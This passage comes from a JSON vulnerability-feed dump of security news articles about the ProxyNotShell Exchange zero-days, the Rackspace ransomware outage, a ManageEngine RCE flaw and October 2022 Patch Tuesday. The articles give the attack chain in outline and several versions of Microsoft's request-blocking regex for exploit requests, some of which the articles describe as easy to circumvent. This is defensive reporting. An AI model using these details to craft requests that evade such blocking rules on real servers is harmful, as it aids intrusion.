"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T17:45:00", "type": "malwarebytes", "title": "Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T17:45:00", "id": "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-now-october-patch-tuesday-fixes-actively-used-zero-day", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "It's not been a great week for cloud computing service provider Rackspace.\n\nOn December 2, customers began experiencing problems connecting and logging into their Exchange environments. Rackspace started [investigating](<https://status.apps.rackspace.com/index/viewincidents?group=2>) and discovered an issue that affected its Hosted Exchange environments. \n\nNow Rackspace has announced it was actually a ransomware incident that caused the service disruptions.\n\nWhile the investigation is ongoing, there are no details known about which ransomware is at play or how the threat actor gained initial access. In a [press release](<https://www.rackspace.com/newsroom/rackspace-technology-hosted-exchange-environment-update>) Rackspace said that the incident was isolated to its Hosted Exchange business. Rackspace has not showed up on any of the known leak sites that ransomware groups use to apply extra pressure on their victims, but this could also be due to the fact that there are ongoing negotiations.\n\n## Hosted Exchange\n\nRackspace&#x27;s Hosted Exchange customers are mostly small to medium size businesses that don&#x27;t have the need or staff to run a dedicated on-premise Exchange server. The outage still affects all services in its Hosted Exchange environment, including MAPI/RPC, POP, IMAP, SMTP, and ActiveSync, as well as the Outlook Web Access (OWA) interface that provides access to online email management.\n\n## Workaround\n\nRackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing:\n\n> &quot;As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address. Please log in to your customer account for a ticket with instructions to request this option. Customers should reply to the ticket to request the forwarding rule be put into place for each of their users.&quot;\n\n## Impact\n\nIn an [8-K SEC filing](<https://www.sec.gov/ix?doc=/Archives/edgar/data/0001810019/000119312522298940/d388117d8k.htm>) Rackspace states that it expects a loss of revenue due to the ransomware attack's impact on its $30 million Hosted Exchange business. An 8-K form is required to report any events concerning a company that could be of importance to the shareholders of that company or the Securities and Exchange Commission (SEC).\n\n## The attack vector\n\nOne possible attack vector was [pointed out by security researcher Kevin Beaumont](<https://doublepulsar.com/rackspace-cloud-office-suffers-security-breach-958e6c755d7f>). It might be due to exploitation of the Microsoft Exchange vulnerabilities tracked as [CVE-2022-41040 and CVE-2022-41082](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>), known as ProxyNotShell.\n\nBeaumont found a Rackspace Exchange server cluster--currently offline--was running a build number from August 2022 a few days prior to the incident disclosure. Since the ProxyNotShell vulnerabilities were only fixed in November, it&#x27;s possible that threat actors exploited the flaws to breach Rackspace servers.\n\nOne important conclusion Beaumont notes in his post is:\n\n> &quot;For a [managed service provider (MSP)](<https://www.malwarebytes.com/partners/managed-service-providers>) running a shared cluster, such as Hosted Exchange, it means that one compromised account of one customer will compromise the entire hosted cluster.&quot;\n\nThis is what may have happened at Rackspace. Don&#x27;t let it happen to you.\n\n* * *\n\n**We don&#x27;t just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<\u201chttps://www.malwarebytes.com/for-home\u201d>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T12:00:00", "type": "malwarebytes", "title": "Rackspace confirms it suffered a ransomware attack", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-08T12:00:00", "id": "MALWAREBYTES:B0C4B025BF22D777A196390CAE7FC07F", "href": "https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-05T00:04:37", "description": "Microsoft has issued some [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The company says it \"is aware of limited targeted attacks using the two vulnerabilities to get into users&#x27; systems.\" The move follows discussion online about whether two new Exchange [zero-days](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) are really new vulnerabilities, or just [new exploits for known vulnerabilities](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>).\n\nSo, let&#x27;s start with the most important part: What should you do if you&#x27;re tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it's providing mitigations and detection guidance:\n\nMicrosoft Exchange Online Customers do not need to take any action.\n\n## Update October 4, 2022\n\nMicrosoft has [adapted the mitigation advice](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it provided originally to block attacks on these vulnerabilities, because they were too easy to circumvent. The most significant change is the recommendation for Exchange Server customers to disable remote PowerShell access for non-admin users in your organization. Guidance on how to do this for single user or multiple users is [here](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>). Microsoft alos removed the option to block the ports that are used for Remote PowerShell, but doesn't mention this in the updates section.\n\nSome experts are promoting a more effective string to use in the Request Blocking instructions as shown under points 7 and 8 below. The change is minimal, but should be a significant improvement.\n\n`.*autodiscover\\.json.*Powershell.*`\n\nThese were the original instructions:\n\nUsers of the on premises product should add a blocking rule in IIS Manager** **to block the known attack patterns. According to Microsoft, the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:\n\n 1. Open the IIS Manager.\n 2. Expand the Default Web Site.\n 3. Select Autodiscover.\n 4. In the Feature View, click URL Rewrite.\n 5. In the Actions pane on the right-hand side, click Add Rules. \n 6. Select Request Blocking and click OK.\n 7. Add String `.*autodiscover\\.json.*\\@.*Powershell.*` and click OK.\n 8. Expand the rule and select the rule with the Pattern `.*autodiscover\\.json.*\\@.*Powershell.*` and click Edit under Conditions.\n 9. Change the condition input from {URL} to {REQUEST_URI}\n\nThe instructions above can be found on the [Microsoft blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>), with screenshots. It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.\n\nAnother option is to block the ports that are used for Remote PowerShell--**HTTP: 5985** and **HTTPS: 5986**.\n\n## The vulnerabilities\n\nThe vulnerabilities were discovered by [GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) while performing security monitoring and incident response services. It was able to assess that the attacks were based on exploit requests with the same format as ProxyShell. But the servers being attacked had all the latest updates, including those that stop ProxyShell.\n\nThe attacks were used to drop web shells on the Exchange servers--a script that can be used by an attacker to run remote commands and maintain persistent access on an already compromised computer.\n\nAccording to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1575580072961982464>) a significant number of Exchange servers has been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Content Updates and don't patch ProxyShell properly.\n\nOn his blog on the subject he points out that if you don&#x27;t run Microsoft Exchange on premise, and don&#x27;t have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.\n\nThe vulnerabilities, which are chained together, are:\n\n[CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>), a Server-Side Request Forgery (SSRF) vulnerability. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization's infrastructure.\n\n[CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T13:00:00", "type": "malwarebytes", "title": "[updated]Two new Exchange Server zero-days in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T13:00:00", "id": "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "href": "https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-28T00:05:01", "description": "CISA (the Cybersecurity and Infrastructure Security Agency) recently added **[CVE-2022-35405--](<https://nvd.nist.gov/vuln/detail/CVE-2022-35405>)**a remote code execution(RCE) vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier)--to its [Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), a list of known CVEs that carry significant risk to the federal enterprise. Doing this forces all Federal Civilian Executive Branch Agencies (FCEB) to patch this bug.\n\n[According to BleepingComputer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-manageengine-rce-bug-used-in-attacks/>), federal agencies that may be affected by CVE-2022-35405 have until October 13 to ensure they're patched and their networks are protected from attacks leveraging this vulnerability.\n\nCVE-2022-35405 is a critical vulnerability. When exploited, attackers can execute potentially malicious code on affected installations of ManageEngine software--without authentication for Password Manager Pro and PAM360, and with authentication for Access Manager Plus.\n\nResearcher Vinicius Pereira [first flagged](<https://www.bigous.me/2022/09/06/CVE-2022-35405.html>) this vulnerability in June 2022. Since then, several [PoCs (proofs-of-concepts)](<https://xz.aliyun.com/t/11578>) and [a Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16852>) for it have been made public.\n\nManageEngine [\"strongly recommends\"](<https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>) that its clients upgrade their affected software as soon as possible. The company pointed to the following locations where customers can download updates:\n\n * Access Manager Plus - <https://www.manageengine.com/privileged-session-management/upgradepack.html>\n * PAM360 - <https://www.manageengine.com/privileged-access-management/upgradepack.html>\n * Password Manager Pro - <https://www.manageengine.com/products/passwordmanagerpro/upgradepack.html>\n\nWhile private organizations don't have a ruling requiring them to patch noteworthy flaws, [CISA still urges](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/22/cisa-has-added-one-known-exploited-vulnerability-catalog>) them to patch as soon as they can.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-27T11:30:00", "type": "malwarebytes", "title": "Flaw in some ManageEngine apps is being actively exploited, says CISA", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-27T11:30:00", "id": "MALWAREBYTES:9446395F8878B21ADE37FDE8E05D9D37", "href": "https://www.malwarebytes.com/blog/news/2022/09/cisa-reveals-flaw-in-some-manageengine-apps-is-actively-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-10-12T08:05:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB9Dk9_CtwU0e7o73L8Ctcukw86W5iQ5ovoTM1kBO_tiERjq84jxpKHzqShkuM1aMl6Au7sULjY1iTAtzw5NrUSjNj_xsk0dB6JJO3CT8wIaRAnfzA86ZECd4CWN2tjWREiW3roAj-De9vCeIbdpMQGtJC0njmkr2-6-1DXvcz3yDBVBEmQ25saSok/s728-e100/windows.jpg>)\n\nMicrosoft's Patch Tuesday update for the month of October has addressed a total of [85 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>), including fixes for an actively exploited zero-day flaw in the wild.\n\nOf the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the [actively exploited](<https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/>) [ProxyNotShell](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) flaws in [Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>).\n\nThe [patches](<https://www.rapid7.com/blog/post/2022/10/11/patch-tuesday-october-2022/>) come alongside [updates to resolve 12 other flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser that have been released since the beginning of the month.\n\nTopping the list of this month's patches is [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the issue.\n\n\"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,\" the company said in an advisory, cautioning that the shortcoming is being actively weaponized in real-world attacks.\n\nThe nature of the flaw also means that the issue is likely chained with other flaws to escalate privilege and carry out malicious actions on the infected host.\n\n\"This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThree other elevation of privilege vulnerabilities of note relate to Windows Hyper-V ([CVE-2022-37979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37979>), CVSS score: 7.8), Active Directory Certificate Services ([CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>), CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect ([CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), CVSS score: 10.0).\n\nDespite the \"Exploitation Less Likely\" tag for CVE-2022-37968, Microsoft noted that a successful exploitation of the flaw could permit an \"unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster.\"\n\nElsewhere, [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) (CVSS score: 3.3) \u2013 an information disclosure vulnerability in Microsoft Office \u2013 is listed as publicly known at the time of release. It could be exploited to leak user tokens and other potentially sensitive information, Microsoft said.\n\nAlso fixed by Redmond are eight privilege escalation flaws in Windows Kernel, 11 remote code execution bugs in Windows Point-to-Point Tunneling Protocol and SharePoint Server, and yet another elevation of privilege vulnerability in the Print Spooler module ([CVE-2022-38028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028>), CVSS score: 7.8).\n\nLastly, the Patch Tuesday update further addresses two more privilege escalation flaws in Windows Workstation Service ([CVE-2022-38034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38034>), CVSS score: 4.3) and Server Service Remote Protocol ([CVE-2022-38045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38045>), CVSS score: 8.8).\n\nWeb security company Akamai, which discovered the two shortcomings, [said](<https://www.akamai.com/blog/security-research/cold-hard-cache-bypassing-rpc-with-cache-abuse>) they \"take advantage of a design flaw that allows the bypass of [Microsoft [Remote Procedure Call](<https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page>)] security [callbacks](<https://learn.microsoft.com/en-us/windows/win32/rpc/callbacks>) through caching.\"\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by several vendors to rectify dozens of vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-10-01>)\n * [Apache Projects](<https://news.apache.org/foundation/entry/the-apache-news-round-up276>)\n * [Apple](<https://support.apple.com/en-us/HT213480>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=10-2022>) (including an [actively exploited flaw](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>))\n * [GitLab](<https://about.gitlab.com/releases/2022/10/03/gitlab-15-4-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_11.html>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/October-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-12T07:07:00", "type": "thn", "title": "Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-37979", "CVE-2022-38028", "CVE-2022-38034", "CVE-2022-38045", "CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T07:07:54", "id": "THN:0521233945B9471C64D546BD2B006823", "href": "https://thehackernews.com/2022/10/microsoft-patch-tuesday-fixes-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T16:20:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiLG9V9B_xVvwA7aFCGySTOO5wtWjfUUfXnD668vDSJkbzBIm2NPP6g1ky-ViCG-wKLpXABQxIlv8utmjMKQL51hpJiXyYY2TLTY38wdOqX0wsX_F8diipfii3BtEeoyjJyWWMKayJerKNP8K8LA9mMdq2btrtQu479xoi3zF86AABjwbqGkg-1x_DY/s728-e100/ms.jpg>)\n\nMicrosoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the [two newly disclosed zero-day flaws](<https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html>) in a limited set of attacks aimed at less than 10 organizations globally.\n\n\"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration,\" the Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) in a new analysis.\n\nThe weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the \"highly privileged access Exchange systems confer onto an attacker.\"\n\nThe tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier last month on September 8-9, 2022.\n\nThe two vulnerabilities have been collectively dubbed [**ProxyNotShell**](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>), owing to the fact that \"it is the same path and SSRF/RCE pair\" as [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) but with authentication, suggesting an incomplete patch.\n\nThe issues, which are strung together to achieve remote code execution, are listed below -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) (CVSS score: 8.8) - Microsoft Exchange Server Remote Code Execution Vulnerability\n\n\"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user,\" Microsoft said. \"Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDHuP8RcawOweo1l6ugi9Ob9HAQv5FloiZoBENRZJT1OGy1-icUmXQvdS86HsNfrxOCd9PP7M0XaqOZf1bLcVGic0MzVny5fGJtRDkn9gJzNIkyRzbf0NI5KIZSFcJkY_K7_R4TE6PtOAWo3h_NhgHlKy4YxwtTGQVxWAPzI6FaEI3z9CMmjvAJYMUZA/s728-e100/ms.jpg>)\n\nThe vulnerabilities were [first discovered](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>) by Vietnamese cybersecurity company GTSC as part of its incident response efforts for an unnamed customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.\n\nMicrosoft said that it's working on an \"accelerated timeline\" to release a fix for the shortcomings. It has also [published a script](<https://aka.ms/EOMTv2>) for the following URL Rewrite mitigation steps that it said is \"successful in breaking current attack chains\" -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern .*autodiscover\\\\.json.*\\@.*Powershell.* and click Edit under Conditions.\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nAs additional prevention measures, the company is urging companies to enforce multi-factor authentication (MFA), disable [legacy authentication](<https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication#moving-away-from-legacy-authentication>), and educate users about [not accepting](<https://thehackernews.com/2022/09/uber-claims-no-sensitive-data-exposed.html>) unexpected two-factor authentication (2FA) prompts.\n\n\"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons,\" Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.\n\n\"First, Exchange [...] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:36:00", "type": "thn", "title": "State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T12:45:52", "id": "THN:A5B36072ED31304F26AF0879E3E5710E", "href": "https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-10T04:05:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjeUWuPrjVRtuLfvZ08ImJeXt0BdQpRXeQ6I0n0SAV_PvlNadxnD9aN7xs4GdR3dnw4vc_xgBx7ZMfuF4JsmZ8SVjY0DMxorkecTx87m3KMhPPwj-eMcuw7qBH0ZOWX2k0C8AUY_BQjxGr0uihjZw9opxQt8RNXIK3HVcztB-5v-tFUuZFDzyfQoLAw/s728-e100/ms.jpg>)\n\nMicrosoft on Friday [disclosed](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it has made more improvements to the [mitigation method](<https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html>) offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server.\n\nTo that end, the tech giant has revised the blocking rule in IIS Manager from \".*autodiscover\\\\.json.*Powershell.*\" to \"(?=.*autodiscover\\\\.json)(?=.*powershell).\"\n\nThe list of updated steps to add the URL Rewrite rule is below -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \"(?=.*autodiscover\\\\.json)(?=.*powershell)\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: (?=.*autodiscover\\\\.json)(?=.*powershell) and click Edit under Conditions\n * Change the Condition input from {URL} to {UrlDecode:{REQUEST_URI}} and then click OK\n\nAlternatively, users can achieve the desired protections by executing a PowerShell-based Exchange On-premises Mitigation Tool ([EOMTv2.ps1](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)), which has also been updated to take into account the aforementioned URL pattern.\n\nThe [actively-exploited issues](<https://viz.greynoise.io/tag/exchange-proxynotshell-vuln-check?days=30>), called ProxyNotShell (CVE-2022-41040 and CVE-2022-41082), are yet to be addressed by Microsoft, although with Patch Tuesday right around the corner, the wait may not be for long.\n\nSuccessful weaponization of the flaws could enable an authenticated attacker to chain the two vulnerabilities to achieve remote code execution on the underlying server.\n\nThe tech giant, last week, [acknowledged](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) that the shortcomings may have been abused by a single state-sponsored threat actor since August 2022 in limited targeted attacks aimed at less than 10 organizations worldwide.\n\n**_Update:_** Microsoft, over the weekend, said that it has once again made a correction to the URL string \u2013 \"(?=.*autodiscover)(?=.*powershell)\" \u2013 to be added to the blocking rule in IIS Manager to prevent exploitation attempts.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 